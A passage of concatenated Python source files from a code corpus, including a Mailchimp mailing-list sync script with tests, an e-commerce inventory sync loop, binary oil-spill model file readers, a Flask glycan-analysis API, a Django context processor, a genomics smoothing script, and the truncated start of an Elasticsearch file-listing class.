or updated\n Users to be unsubscribed\n3. For each of those batches, use:\n listBatchSubscribe() to add new or update existing users on your List\n listBatchUnsubscribe() to remove old users from your List\n\nhttp://apidocs.mailchimp.com/api/how-to/sync-you-to-mailchimp.php\n\nLog:\n\n Run on production by SL at 23:11 EST. 6680 users' `mailing_records` fields were\n updated. 6674 users were subscribed to the Open Science Framework General\n mailing list via the Mailchimp API. Running the migration the first time\n failed due to a user having an GUID record with an incorrect referent (pointing\n to the `osffile` collection rather than `user`). This GUID object was manually\n modified. The migration was run again, and it finished successfully.\n\"\"\"\nimport sys\n\nfrom modularodm import Q\nfrom framework.auth.core import User\nfrom website import mailchimp_utils, settings\nfrom website.app import init_app\nfrom tests.base import OsfTestCase\nfrom tests.factories import UserFactory, UnconfirmedUserFactory\nfrom nose.tools import *\nimport mock\n\nimport logging\nfrom scripts import utils as script_utils\n\nlogger = logging.getLogger(__name__)\nGENERAL_LIST = settings.MAILCHIMP_GENERAL_LIST\n\n\ndef main(dry=True):\n # Set up storage backends\n init_app(routes=False)\n users = list(get_users())\n update_users(users, dry=dry)\n subscribe_users(users, dry=dry) # confirm list name before running script\n\ndef update_users(users, dry=True):\n for user in get_users():\n if not dry:\n if user.mailchimp_mailing_lists is None:\n user.mailchimp_mailing_lists = {}\n user.mailchimp_mailing_lists[GENERAL_LIST] = True\n user.save()\n logger.info('User {}\\'s mailing_lists dict updated.'.format(user._id))\n\ndef get_users():\n \"\"\"Get all users who will be subscribed to the OSF General mailing list.\"\"\"\n # Exclude unconfirmed and unregistered users\n # NOTE: Unclaimed and unconfirmed users have is_registered=False\n return User.find(Q('is_registered', 'eq', True))\n\n\ndef serialize_user(user):\n \"\"\"Return the formatted dict expected by the mailchimp batch subscribe endpoint.\n https://apidocs.mailchimp.com/api/2.0/lists/batch-subscribe.php\n \"\"\"\n return {'email': {'email': user.username},\n 'email_type': 'html',\n 'merge_vars': {\n 'fname': user.given_name,\n 'lname': user.family_name}\n }\n\n\ndef subscribe_users(users, dry=True):\n serialized = [serialize_user(user) for user in users]\n m = mailchimp_utils.get_mailchimp_api()\n list_id = mailchimp_utils.get_list_id_from_name(list_name=GENERAL_LIST)\n logger.info('Subscribing {0} users to {1}...'.format(len(users), GENERAL_LIST))\n if not dry:\n subscribe_info = m.lists.batch_subscribe(\n id=list_id,\n batch=serialized,\n double_optin=False,\n update_existing=True\n )\n logger.info('{n} users subscribed'.format(n=subscribe_info['add_count']))\n\n\n\nclass TestSyncEmail(OsfTestCase):\n\n @classmethod\n def setUpClass(cls):\n super(TestSyncEmail, cls).setUpClass()\n # Cache real mailchimp API key\n cls._mailchimp_api_key = settings.MAILCHIMP_API_KEY\n # use fake api key for tests\n settings.MAILCHIMP_API_KEY = 'pizza-pie'\n\n @classmethod\n def tearDownClass(cls):\n super(TestSyncEmail, cls).tearDownClass()\n # restore API key\n settings.MAILCHIMP_API_KEY = cls._mailchimp_api_key\n cls._mailchimp_api_key = None\n\n def setUp(self):\n super(TestSyncEmail, self).setUp()\n self.user = UserFactory()\n self.unconfirmed = UnconfirmedUserFactory()\n\n def test_update_users(self):\n users = get_users()\n assert_false(self.user.mailchimp_mailing_lists)\n\n update_users(users, dry=False)\n\n assert_equal(self.user.mailchimp_mailing_lists, {'Open Science Framework General': True})\n\n def test_serialize_user(self):\n user = UserFactory()\n result = serialize_user(user)\n assert_equal(result, {'email': {'email': user.username},\n 'email_type': 'html',\n 'merge_vars': {\n 'fname': user.given_name,\n 'lname': user.family_name}\n })\n\n def test_get_users(self):\n users = list(get_users())\n assert_equal(len(users), 1)\n assert_not_in(self.unconfirmed, users)\n assert_equal(users, [self.user])\n\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.list')\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.batch_subscribe')\n def test_subscribe_users_called_with_correct_arguments(self, mock_subscribe, mock_list):\n mock_list.return_value = {'data': [{'id': 1, 'list_name': GENERAL_LIST}]}\n list_id = mailchimp_utils.get_list_id_from_name(GENERAL_LIST)\n\n users = list(get_users())\n\n subscribe_users(users, dry=False)\n\n serialized = [serialize_user(u) for u in users]\n mock_subscribe.assert_called_with(id=list_id,\n batch=serialized,\n double_optin=False,\n update_existing=True\n )\n\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.list')\n @mock.patch('website.mailchimp_utils.mailchimp.Lists.batch_subscribe')\n def test_main(self, mock_subscribe, mock_list):\n mock_list.return_value = {'data': [{'id': 1, 'list_name': GENERAL_LIST}]}\n\n assert_false(self.user.mailchimp_mailing_lists)\n\n main(dry=False)\n\n assert_true(self.user.mailchimp_mailing_lists[GENERAL_LIST])\n mock_subscribe.assert_called()\n\n\nif __name__ == '__main__':\n script_utils.add_file_logger(logger, __file__)\n main(dry='dry' in sys.argv)\n","sub_path":"scripts/sync_email.py","file_name":"sync_email.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"246945876","text":"# -*- coding: utf-8 -*-\nfrom zouxiu_client import *\nfrom const import *\nfrom xml.dom import minidom\nimport time\nimport json\nimport functools\nimport traceback\n\n#python 2.7.9\n\ndef get_all_products(zouxiu_client):\n response = zouxiu_client.getitem(data={ \"pageSize\":100 })\n response_dict = json.loads(response, encoding=\"utf-8\")\n if response_dict['errorCode'] == '0':\n data = response_dict['data']\n total = data['total']\n loop = total/100\n residue = total%100\n total_products_list = []\n for i in range(1, loop+1+(1 if residue!=0 else 0)):\n response = zouxiu_client.getitem(data={ \"pageSize\":100, \"pageNo\":i })\n response_dict = json.loads(response, encoding=\"utf-8\")\n data = response_dict['data']\n item_list = data['list']\n total_products_list += item_list\n return total_products_list\n\n\ndef get_or_empty_str(node, tag_name):\n try:\n return node.getElementsByTagName(tag_name)[0].firstChild.data\n except:\n return \"\"\n\ndef get_image_str(brand, model, material, color):\n try:\n brand_no_str = BRAND_ID_DICT[brand]\n except:\n brand_no_str = ''\n url_str = 'http://img.yvogue.hk/pimg/pl/' + brand_no_str + '/m' + model.lower() + '/m' + material.lower() + '/c' + color.lower() + '.jpg'\n return url_str\n\ndef push_all_products_once():\n zouxiu_client = Zouxiu_client()\n stock_doc = minidom.parse(\"/home/yvogue/sync_erp/zouxiu_client/morning.inventory.hk.xml\")\n erp_products = stock_doc.getElementsByTagName(\"product\")\n map(functools.partial(update_one_product, client=zouxiu_client), erp_products)\n print(\"All products are done\")\n\ndef get_item_from_zouxiu(sku):\n return {}\n\ndef update_one_product(item_list, client):\n parent_sku = item_list[0]\n node = item_list[1]\n print(parent_sku)\n print(node)\n model = get_or_empty_str(node, \"model\")\n material = get_or_empty_str(node, \"material\")\n color = get_or_empty_str(node, \"color\")\n pt_sku = get_or_empty_str(node, \"pt_sku\")\n pt_name = get_or_empty_str(node, \"pt_name\")\n price_eu = get_or_empty_str(node, \"price_eu\")\n price = get_or_empty_str(node, \"price\")\n name = get_or_empty_str(node, \"name\")\n size = get_or_empty_str(node, \"size\")\n brand = get_or_empty_str(node, \"brand\")\n cate = get_or_empty_str(node, \"cate\")\n quantity = get_or_empty_str(node, \"quatity\")\n code = get_or_empty_str(node, \"code\")\n request_data = [\n {\"productDetailUrl\": \"http://www.yvogue.com\",\n \"xopSupplierItems\": [\n {\"productId\": pt_sku,\n \"productName\": name,\n \"brandNameZhs\": brand,\n \"productDesc\": model+'_'+material+'_'+color,\n \"itemId\": code,\n \"stock\":quantity,\n \"supplyPrice\":price,\n \"catName\": cate}\n ],\n \"brandNameZhs\": brand,\n \"productName\": pt_name,\n \"productId\": pt_sku\n }\n ]\n image_str = get_image_str(brand, model, material, color)\n #print(image_str)\n #print(client.product(data=request_data))\n #time.sleep(1)\n\ndef convert_one_product(node):\n #{'母产品id': [母产品下的所有产品列表], ......}\n pt_sku = get_or_empty_str(node, \"pt_sku\")\n return {pt_sku: [node]}\n\ndef merge_two(node1, node2):\n key_of_node2 = node2.keys()[0]\n if node1.has_key(key_of_node2):\n node1[key_of_node2].append(node2[key_of_node2][0])\n else:\n node1[key_of_node2] = node2[key_of_node2]\n return node1\n\ndef convert_one_product_zouxiu(item_dict):\n #{'母产品id': [母产品下的所有产品列表], ......}\n pt_sku = item_dict['productId']\n return {pt_sku: [item_dict]}\n\ndef update_one_stock(item_dict, erp_products_dict, client):\n print(item_dict)\n print(item_dict['productId'])\n print(\"zouxiu stock:\")\n print(item_dict['stock'])\n print(\"erp stock:\")\n erp_item = None\n global updated_count_total\n for i, erp_nodes in erp_products_dict.items():\n for item in erp_nodes:\n if get_or_empty_str(item, \"code\") == item_dict['itemId']:\n erp_item = item\n print(get_or_empty_str(item, \"quatity\"))\n if get_or_empty_str(item, \"quatity\") == None and item_dict['stock'] == None:\n print(\"zouxiu stock == erp_stock, not updating stock...\")\n elif item_dict['stock']!= None and (int(get_or_empty_str(item, \"quatity\")) == int(item_dict['stock'])):\n print(\"zouxiu stock == erp_stock, not updating stock...\")\n else:\n #if get_or_empty_str(item, \"code\")==\"9600000818912\":\n print(\"<-zouxiu stock != erp_stock, need updating stock...\")\n response = client.update_item_stock(data=[{\"itemId\":item_dict['itemId'], \"stock\":get_or_empty_str(item, \"quatity\")}])\n print(response)\n updated_count_total += 1\n print(\"update complete!->\")\n #time.sleep(100)\n erp_products_dict[i].remove(item)\n if erp_products_dict[i] == []:\n erp_products_dict.pop(i, None)\n if erp_item == None:\n print(\"<-zouxiu item not in erp_stock, set stock 0 in zouxiu...\")\n if item_dict['stock'] == None or int(item_dict['stock']) == 0:\n print(\"zouxiu stock already 0, update complete!->\")\n else:\n response = client.update_item_stock(data=[{\"itemId\":item_dict['itemId'], \"stock\":0}])\n updated_count_total += 1\n print(\"zouxiu stock already 0, set 0, update complete!->\")\n\ndef upload_one_erp_product(item_list, zouxiu_items_dict, client):\n parent_sku = item_list[0]\n for node in item_list[1]:\n model = get_or_empty_str(node, \"model\")\n material = get_or_empty_str(node, \"material\")\n color = get_or_empty_str(node, \"color\")\n pt_sku = get_or_empty_str(node, \"pt_sku\")\n pt_name = get_or_empty_str(node, \"pt_name\")\n price_eu = get_or_empty_str(node, \"price_eu\")\n price = get_or_empty_str(node, \"price\")\n name = get_or_empty_str(node, \"name\")\n size = get_or_empty_str(node, \"size\")\n brand = get_or_empty_str(node, \"brand\")\n cate = get_or_empty_str(node, \"cate\")\n quantity = get_or_empty_str(node, \"quatity\")\n code = get_or_empty_str(node, \"code\")\n image_str = get_image_str(brand, model, material, color)\n if zouxiu_items_dict.has_key(parent_sku):\n print(\"<-Parent exist, we create item\")\n request_data = [\n {\"itemId\": code,\n \"itemColor\": color,\n \"productId\": pt_sku,\n \"itemSize\":size,\n \"supplyPrice\":int(float(price)*0.72129),\n \"marketPrice\":int(float(price)*0.72129),\n \"sellPrice\":int(float(price)*0.72129),\n \"mainPicture\":image_str,\n \"catName\": cate,\n \"stock\": quantity}\n ]\n print(client.item(data=request_data))\n print(\"Creating item complete->\")\n time.sleep(1)\n else:\n print(\"<-Parent not exist, we create product\")\n request_data = [\n {\"productDetailUrl\": \"http://www.yvogue.com\",\n \"xopSupplierItems\": [\n {\"productId\": pt_sku,\n \"productName\": name,\n \"brandNameZhs\": brand,\n \"productDesc\": model+'_'+material+'_'+color,\n \"itemId\": code,\n \"stock\":quantity,\n \"supplyPrice\":int(float(price)*0.72129),\n \"marketPrice\":int(float(price)*0.72129),\n \"sellPrice\":int(float(price)*0.72129),\n \"mainPicture\":image_str,\n \"catName\": cate}\n ],\n \"brandNameZhs\": brand,\n \"productName\": pt_name,\n \"productId\": pt_sku\n }\n ]\n print(client.product(data=request_data))\n print(\"Creating product complete->\")\n zouxiu_items_dict[parent_sku] = {}\n time.sleep(1)\n\ndef update_all_products():\n stock_doc = minidom.parse(\"/home/yvogue/sync_erp/zouxiu_client/morning.inventory.hk.xml\")\n zouxiu_client = Zouxiu_client()\n\n erp_products = stock_doc.getElementsByTagName(\"product\")\n erp_products_dict = reduce(merge_two, map(convert_one_product, erp_products))\n all_zouxiu_items = get_all_products(zouxiu_client=zouxiu_client)\n all_zouxiu_items_dict = reduce(merge_two, map(convert_one_product_zouxiu, all_zouxiu_items))\n\n #map(functools.partial(update_one_product, client={}), erp_products_dict.iteritems())\n print(\"--------------------------------------------------------------------------------------------------\")\n print(\"Firstly, we update stocks!\")\n print(\"--------------------------------------------------------------------------------------------------\")\n time.sleep(3)\n map(functools.partial(update_one_stock, erp_products_dict = erp_products_dict, client=zouxiu_client), all_zouxiu_items)\n print(\"First step finished!\")\n print(\"updated:\")\n print(updated_count_total)\n time.sleep(5)\n\n #print(\"NEW PRODUCTS:\")\n #print(erp_products_dict)\n print(\"--------------------------------------------------------------------------------------------------\")\n print(\"Secondly, we create new products!\")\n print(\"--------------------------------------------------------------------------------------------------\")\n time.sleep(3)\n #print(erp_products_dict)\n map(functools.partial(upload_one_erp_product, zouxiu_items_dict=all_zouxiu_items_dict, client=zouxiu_client), erp_products_dict.iteritems())\n\n print(\"--------------------------------------------------------------------------------------------------\")\n print(\"All products are updated!\")\n print(\"--------------------------------------------------------------------------------------------------\")\n print(erp_products_dict)\n return True\n\nwhile True:\n while True:\n try:\n updated_count_total = 0\n update_all_products()\n break\n except:\n traceback.print_exc()\n print(\"Network failure, retry in 60secs...\")\n time.sleep(60)\n import gc\n gc.collect()\n print(\"sleep 5*60 sec...\")\n time.sleep(5*60)\n\n","sub_path":"update_all_products.py","file_name":"update_all_products.py","file_ext":"py","file_size_in_byte":10946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570994424","text":"import os\nimport struct\nfrom collections import OrderedDict\n\ndef read_lu3(data):\n \"\"\"Return a dictionary of arrays with data from the LU3 file\n :param bytes data: LU3 file in binary form\"\"\"\n\n rec = OrderedDict([\n (\"Version\", []), (\"Simtime\",[]), (\"Time\", []), (\"rec1st\",[]), (\"rec2st\",[]), (\"rec2end\",[]),\n (\"rec3st\",[]), (\"rec3end\",[]), (\"rec5st\",[]), (\"rec5end\",[]), (\"sed2st\",[]), (\"sed2end\",[]),\n (\"rar1st\",[]), (\"rar1end\",[]), (\"rth1st\",[]), (\"rth1end\",[]), (\"rsf1st\",[]), (\"rsf1end\",[]),\n (\"rsp1st\",[]), (\"rsp1end\",[]), (\"rss1st\",[]), (\"rss1end\",[]), (\"rat1st\",[]), (\"rat1end\",[]),\n ])\n\n i = True\n while(i):\n try:\n for k in rec.keys():\n rec[k].append(struct.unpack('i' if k!=\"Time\" else 'f', data.read(4))[0]) # one float value\n except struct.error:\n i = False\n return rec\n\n\ndef read_slk(lu3rec, data):\n \"\"\"Read SLK data from binary form by using a struct to unpack the bytes. Creates an array:\n [\n (time0, [ [ihab_rec0, dx_rec0, dy_rec0, LON_rec0, LAT_rec0, v1_rec0, v2_rec0, v3_rec0, v4_rec0], [...] ]),\n (time1, [...]),\n ...\n (timeN, ...)\n ]\n All SLK variables are floats.\n :param dict lu3rec: record of byte offsets from LU3 file, corresponding to each time step record\n :param bytes data: SLK file read in binary form\"\"\"\n\n fields = [\"ihab\", \"dx\", \"dy\", \"LON\", \"LAT\", \"v1\", \"v2\", \"v3\", \"v4\"]\n fstart = lu3rec['rss1st'][0] * 36 # number of records * record size = byte offset to start at\n data.seek(fstart)\n\n slk_out = []\n recs = zip(lu3rec['rss1st'], lu3rec['rss1end'], lu3rec['Time'])\n for (start, end, time) in recs:\n try:\n tstep_out = []\n for _rec in range(end-start+1):\n _rec_out = []\n for k in fields:\n _rec_out.append(struct.unpack('f', data.read(4))[0]) # all floats\n tstep_out.append(_rec_out)\n if tstep_out: # where the range is 0 (start==end), we don't need to append any records\n slk_out.append((time, tstep_out))\n except struct.error:\n break\n\n return slk_out\n\n\ndef read_tr3(lu3rec, data):\n \"\"\"Read TR3 data from binary form by using a struct to unpack the bytes. Creates two arrays:\n [ # spillets\n (time0, [ [xspil, yspil, ... spilletNumber], [...] ]),\n (time1, [...]),\n ...\n (timeN, ...)\n ]\n [ # shoreline\n (time0, [ [ICellIndex, JCellIndex, ...], [...] ]),\n (time1, [...]),\n ...\n (timeN, ...)\n ]\n Spillets have only two integer variables: ptype and spilletNumber; the rest are floats.\n Shoreline data has 3 integer variables: ICellIndex, JCellIndex, and shoretype. The rest are floats.\n :param dict lu3rec: record of byte offsets from LU3 file, corresponding to each time step record\n :param bytes data: TR3 file read in binary form\"\"\"\n\n fields_spl = [\"xspil\", \"yspil\", \"rspil\", \"xspilold\", \"yspilold\", \"ptype\", \"surf\", \"dspilm\", \"viscm\", \"fwc\", \"age\", \"spilletNumber\"]\n fields_shr = [\"ICellIndex\", \"JCellIndex\", \"shoretype\", \"ShoreArea\", \"ShoreLength\", \"ShoreViscosity\", \"SegmentLon1\",\n \"SegmentLat1\", \"SegmentLon2\", \"SegmentLat2\", \"ShoreMass\", \"ex2\"]\n\n fstart = lu3rec['rec2st'][0] * 48 # number of records * bytes per record = byte offset\n data.seek(fstart) # seek to the beginning of records\n\n recs_out_spl = [] # array [(time, record_array), ...]\n recs_out_shr = []\n\n # loop through timestep, index position groups\n for (rec2st, rec2end, rec3st, rec3end, time) in zip(lu3rec['rec2st'], lu3rec['rec2end'], lu3rec['rec3st'], lu3rec['rec3end'], lu3rec['Time']):\n try:\n # spillets---\n tstep_records_spl = [] # hold all spillet records for *this* timestamp\n for _rec in range(rec2end-rec2st): # obtain this many records for this timestep\n _rec_out = []\n for k in fields_spl:\n _rec_out.append(struct.unpack('f' if k not in [\"ptype\", \"spilletNumber\"] else 'i', data.read(4))[0])\n tstep_records_spl.append(_rec_out) # append the newly created record \n recs_out_spl.append((time, tstep_records_spl)) # append all records for this timestep\n\n # seek to the starting index of rec3st for *this* timestamp\n data.seek(rec3st * 48)\n \n # shoreline--- same steps as spillets\n tstep_records_shr = []\n for _rec in range(rec3end-rec3st):\n _rec_out = []\n for k in fields_shr:\n _rec_out.append(struct.unpack('f' if k not in [\"ICellIndex\", \"JCellIndex\", \"shoretype\"] else 'i', data.read(4))[0])\n tstep_records_shr.append(_rec_out)\n recs_out_shr.append((time, tstep_records_shr))\n\n data.read(48*7) # blank group between timestep-groups of 7 bytes, which we must multiply by 48 (size of each record)\n\n except struct.error:\n break\n return (recs_out_spl, recs_out_shr)\n","sub_path":"outdata/asa_model_esri/ARAMCO_OILMAP_Postgres_Py/read_fmt.py","file_name":"read_fmt.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264649836","text":"from flask import g, jsonify, current_app, request\n\n\n# from glycresoft_app.utils import json_serializer\nfrom glycan_profiling.serialize import IdentifiedGlycopeptide\nfrom glycan_profiling.plotting import colors\nfrom glycan_profiling.chromatogram_tree import mass_shift\nfrom glypy.composition import formula\nfrom glypy.composition.glycan_composition import from_iupac_lite, IUPACError\nfrom glycopeptidepy.structure.modification import ModificationTable, ModificationCategory\n\nfrom .service_module import register_service\nfrom .view_hypothesis import _locate_hypothesis\n\n\napi = register_service(\"api\", __name__)\n\n\n@api.route(\"/api/identified_glycopeptide/\")\ndef get_glycopeptide_match_api(id):\n gpm = g.db.query(IdentifiedGlycopeptide).get(id)\n if gpm:\n gpm = gpm\n return jsonify(**{\n \"id\": gpm.id, \"glycopeptide\": str(gpm.structure.glycopeptide_sequence), \"ms2_score\": gpm.ms2_score,\n \"ms1_score\": gpm.ms1_score\n })\n\n\n@api.route(\"/api/tasks\")\ndef api_tasks():\n return jsonify(**{t.id: t.to_json() for t in g.manager.tasks().values()})\n\n\n@api.route(\"/api/colors\")\ndef api_colors():\n return jsonify(**colors.color_dict())\n\n\n@api.route(\"/api/samples\")\ndef api_samples():\n samples = g.manager.samples(g.user)\n d = {}\n for h in samples:\n try:\n d[str(h.name)] = h.to_json()\n except Exception:\n current_app.logger.exception(\"Error occurred in api_samples\", exc_info=True)\n return jsonify(**d)\n\n\n@api.route(\"/api/hypotheses\")\ndef api_hypotheses():\n d = {}\n for hypothesis in g.manager.glycan_hypotheses(g.user):\n try:\n dump = hypothesis.to_json()\n d[hypothesis.uuid] = dump\n except Exception:\n current_app.logger.exception(\"Error occurred in api_hypotheses\", exc_info=True)\n for hypothesis in g.manager.glycopeptide_hypotheses(g.user):\n try:\n dump = hypothesis.to_json()\n d[hypothesis.uuid] = dump\n except Exception:\n current_app.logger.exception(\"Error occurred in api_hypotheses\", exc_info=True)\n return jsonify(**d)\n\n\n@api.route(\"/api/hypotheses/\")\ndef get_hypothesis(uuid):\n hypothesis = _locate_hypothesis(uuid)\n return jsonify(hypothesis=hypothesis.to_json())\n\n\n@api.route(\"/api/analyses\")\ndef api_analyses():\n d = {}\n for analysis in g.manager.analyses(g.user):\n try:\n dump = analysis.to_json()\n d[analysis.uuid] = dump\n except Exception:\n current_app.logger.exception(\"Error occurred in api_analyses for %r\", analysis, exc_info=True)\n return jsonify(**d)\n\n\n@api.route(\"/api/modifications\")\ndef modifications():\n d = {}\n mt = ModificationTable()\n d['definitions'] = [\n (rule.title, formula(rule.composition), rule.mass) for rule in mt.rules()\n ]\n d['specificities'] = set()\n for rule in mt.rules():\n if (ModificationCategory.substitution in rule.categories or\n ModificationCategory.glycosylation in rule.categories or\n ModificationCategory.other_glycosylation in rule.categories):\n continue\n d['specificities'].update(rule.as_spec_strings())\n d['specificities'] = tuple(d['specificities'])\n return jsonify(**d)\n\n\n@api.route(\"/api/validate-iupac\", methods=[\"POST\"])\ndef api_validate_iupac():\n payload = str(request.values.get(\"target_string\")).strip()\n if payload == \"\":\n return jsonify(valid=False, message=\"empty name\", query=payload)\n try:\n residue = from_iupac_lite(payload)\n return jsonify(valid=True, message=str(residue), query=payload)\n except IUPACError as e:\n return jsonify(valid=False, message=str(e), query=payload)\n\n\n@api.route(\"/api/mass-shift\")\ndef mass_shifts():\n d = {}\n d.update(mass_shift.mass_shift_index)\n return jsonify(**d)\n","sub_path":"glycresoft_app/services/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"123703171","text":"from django.conf import settings\n\nfrom timepiece import models as timepiece\nfrom timepiece.forms import QuickSearchForm\n\n\ndef timepiece_settings(request):\n default_famfamfam_url = settings.STATIC_URL + 'images/icons/'\n famfamfam_url = getattr(settings, 'FAMFAMFAM_URL', default_famfamfam_url)\n context = {\n 'FAMFAMFAM_URL': famfamfam_url,\n }\n return context\n\n\ndef quick_search(request):\n return {\n 'quick_search_form': QuickSearchForm(),\n }\n\n\ndef active_entries(request):\n active_entries = None\n\n if request.user.is_authenticated():\n active_entries = timepiece.Entry.objects.filter(\n end_time__isnull=True,\n ).exclude(\n user=request.user,\n ).select_related('user', 'project', 'activity')\n\n return {\n 'active_entries': active_entries,\n }\n\n\ndef extra_nav(request):\n context = {\n 'extra_nav': getattr(settings, 'EXTRA_NAV', {})\n }\n return context\n","sub_path":"timepiece/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"266751017","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 29 18:22:58 2019\n\n@author: andyb\n\"\"\"\n\n# %%\nimport pandas as pd\nimport argparse\nfrom sklearn.linear_model import LinearRegression\n# import seaborn as sns\n# import pyBigWig\nimport numpy as np\nfrom scipy import stats\nimport time\nimport statsmodels.api as sm\n# import matplotlib.pyplot as plt\nfrom scipy.stats import zscore\n\n# %%\nparser = argparse.ArgumentParser(description='build linear model a smooth')\nparser.add_argument('--datafile', required=True)\nparser.add_argument('--rep_timing', required=True)\nparser.add_argument('--signal', required=True)\n\nargs = parser.parse_args()\n\n# %%\n# args = argparse.Namespace()\n# args.datafile = '/faststorage/project/reprator/Andrej/reprator2/data/signal/LUAD/603e16bf-9b05-49c9-a925-f409626c969a.signal.feather'\n# args.rep_timing = '/faststorage/project/reprator/Andrej/reprator2/data/bigwigs/rep_timing.feather'\n# args.signal = \"/faststorage/project/reprator/Andrej/reprator2/data/residuals/LUAD/603e16bf-9b05-49c9-a925-f409626c969a/smoothing_1400/extreme_2/signal.feather\"\n\n# %%\nsplit = args.signal.split('/')\npath = '/'.join(split[0: -3])\nsmoothing = split[-3].split('_')[-1]\nextreme = split[-2].split('_')[-1]\n\n# %%\n# args.lm_stats = '/faststorage/project/reprator/Andrej/reprator2/data/results/LUAD/603e16bf-9b05-49c9-a925-f409626c969a.lm_stats.tsv'\nargs.lm_stats = f'{path}/smoothing_{smoothing}/extreme_{extreme}/lm_stats.tsv'\n# args.final_df = '/faststorage/project/reprator/Andrej/reprator2/data/results/LUAD/603e16bf-9b05-49c9-a925-f409626c969a.feather'\n# args.final_df = f'{path}/{smoothing}/final_df.feather'\n# args.plot_dir = '/faststorage/project/reprator/Andrej/reprator2/data/results/LUAD/603e16bf-9b05-49c9-a925-f409626c969a_plots'\nargs.plot_dir = f'{path}/smoothing_{smoothing}/extreme_{extreme}/plots'\n# plot for each chromosome\n\n# %%\ndata = pd.read_feather(args.datafile)\ndata['rep_timing'] = pd.read_feather(args.rep_timing)['rep_timing']\ndata_pure = data.query('ideal').dropna()\n\n# %%\n# sns.jointplot('segment', 'copy', data_pure, kind=\"hex\")\n# data_pure.loc[:, ['copy', 'segment']].describe()\n\n# %% build linear model\nlm = LinearRegression()\nlm.fit(data_pure.loc[:, ['segment']], data_pure['copy'])\nr2 = lm.score(data_pure.loc[:, [\"segment\"]], data_pure[\"copy\"])\n\n# %%\ndata_pure['predicted'] = lm.predict(data_pure.loc[:, [\"segment\"]])\ndata_pure['residuals'] = data_pure[\"copy\"] - data_pure['predicted']\n\n# %%\n# data_pure.loc[:, ['residuals', 'rep_timing']].corr()\n\n# %%\n\n# tmp = data_pure\n\n# %%\n# sns.lineplot(tmp['start'], stats.zscore(tmp['residuals']))\n# sns.lineplot(tmp['start'], stats.zscore(tmp['rep_timing']))\n# sns.lineplot(tmp['start'], stats.zscore(tmp['loess']))\n\n# %% filter based on z score\ndata_pure['residuals_Z_score'] = zscore(data_pure['residuals'])\ndata_pure = data_pure[data_pure['residuals_Z_score'] < float(extreme)]\ndata_pure = data_pure[data_pure['residuals_Z_score'] > -float(extreme)]\n# tmp.shape[0] - data_pure.shape[0]\n\n\n# %%\ndata_pure['loess'] = np.nan\ndata_pure.reset_index(drop=True, inplace=True)\n\n# %%\nfor i in range(22, 0, -1):\n tmp = data_pure.query(f\"chr == 'chr{i}'\")\n size = tmp.shape[0]\n\n start = time.time()\n loess = sm.nonparametric.lowess(stats.zscore(tmp['residuals']), range(size),\n frac=float(smoothing) / size)\n print(size, time.time() - start)\n\n data_pure.iloc[tmp.index, -1] = loess[:, 1]\n\n# %%\ndata_pure.to_feather(args.signal)\n\n# %%\n# plt.ioff()\n# for i in range(22, 0, -1):\n# fig, ax = plt.subplots()\n# tmp = data_pure.query(f\"chr == 'chr{i}'\")\n# \n# sns.lineplot(tmp['start'], stats.zscore(tmp['rep_timing']), ax=ax)\n# sns.lineplot(tmp['start'], stats.zscore(tmp['loess']), ax=ax)\n# ax.legend(('rep_time', 'loess'))\n# \n# outplot = args.plot_dir + f'/chr{i}.png'\n# fig.savefig(outplot, dpi=300)\n# print(outplot)\n# \n# %%\ncorrelation = data_pure.loc[:, ['rep_timing', 'loess']].corr().iloc[0, 1]\n\n# %%\nwith open(args.lm_stats, 'w') as f:\n lines = ['intercept\\tslope\\tr_squared\\tcorr\\n',\n f'{lm.intercept_}\\t{lm.coef_[0]}\\t{r2}\\t{correlation}\\n']\n f.writelines(lines)\n","sub_path":"pipeline/scripts/build_linear_model_with_extremes.py","file_name":"build_linear_model_with_extremes.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"127668031","text":"import logging\n# import datetime\nimport os\n# import urllib2\n# import json\nfrom elasticsearch_dsl.query import Q\nfrom designsafe.apps.data.models.elasticsearch import IndexedFile\nfrom designsafe.apps.api.agave import get_service_account_client\nfrom django.conf import settings\nimport magic\nimport re\n\n# pylint: disable=invalid-name\nlogger = logging.getLogger(__name__)\n# pylint: enable=invalid-name\n\n\nclass FileManager(object):\n \"\"\"Elasticsearch File Manager Class\"\"\"\n def __init__(self, username):\n self.username = username\n\n def _pems_filter(self):\n term_username_query = Q(\n 'term',\n **{'permissions.username': self.username}\n )\n term_world_query = Q(\n 'term',\n **{'permissions.username': 'WORLD'}\n )\n bool_query = Q('bool')\n bool_query.should = [term_username_query, term_world_query]\n nested_query = Q('nested')\n nested_query.path = 'permissions'\n nested_query.query = bool_query\n return nested_query\n\n def listing(self, system='designsafe.storage.default', path='/'):\n \"\"\"Lists a file\n\n :param str system: System Id. Default: designsafe.storage.default\n :param str path: Path\n \"\"\"\n logger.debug('listing %s', os.path.join(system, path))\n search = IndexedFile.search()\n term_system_query = Q(\n 'term',\n **{'system._exact': system}\n )\n term_path_query = Q('term', **{'path._exact': path})\n bool_query = Q('bool')\n bool_query.must = [term_system_query, term_path_query]\n bool_query.filter = self._pems_filter()\n search = search.query(bool_query)\n search = search.sort({'name._exact': 'asc'})\n res = search.execute()\n logger.debug('res %s', str(res.hits.total))\n return res, search\n\n def listing_recursive(\n self,\n system='designsafe.storage.default',\n path='/'):\n \"\"\"Lists every folder's children\"\"\"\n search = IndexedFile.search()\n term_system_query = Q(\n 'term',\n **{'system._exact': system}\n )\n term_path_query = Q('term', **{'path._path': path})\n bool_query = Q('bool')\n bool_query.must = [term_system_query, term_path_query]\n bool_query.filter = self._pems_filter()\n search = 